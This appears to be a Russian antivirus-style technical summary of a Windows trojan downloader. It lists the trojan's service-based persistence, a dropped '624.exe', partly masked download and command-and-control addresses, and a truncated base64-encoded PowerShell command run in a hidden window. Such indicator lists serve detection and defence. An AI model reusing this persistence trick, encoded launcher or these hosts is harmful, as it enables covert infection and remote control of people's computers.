Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\idebugmake] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\idebugmake] 'ImagePath' = '"%WINDIR%\SysWOW64\idebugmake.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAGoAZwByAHYAZgBqAGQAagA9ACcAVQBpAGcAdQBiAGkAbABiAGYAbABhACcAOwAkAEUAdwB5AHAAbQBtAHYAaQBhAGYAZAB0AGMAIAA9ACAAJwA2ADIANAAnADsAJABHAGkAcgB5AGEAZABuAHkAagBqAHoAPQAnAEMAcgB2AHQAcABqAHgAcgA...
- %HOMEPATH%\624.exe
- %HOMEPATH%\624.exe в %WINDIR%\syswow64\idebugmake.exe
- http://ac####y.seongon.com/wp-content/4h2x11317/
- http://18#.##3.113.67:443/forced/add/ringin/ via 18#.#73.113.67
- DNS ASK ac####y.seongon.com
- '%HOMEPATH%\624.exe'
- '%WINDIR%\syswow64\idebugmake.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAGoAZwByAHYAZgBqAGQAagA9ACcAVQBpAGcAdQBiAGkAbABiAGYAbABhACcAOwAkAEUAdwB5AHAAbQBtAHYAaQBhAGYAZAB0AGMAIAA9ACAAJwA2ADIANAAnADsAJABHAGkAcgB5AGEAZABuAHkAagBqAHoAPQAnAEMAcgB2AHQAcABqAHgAcgA...' (со скрытым окном)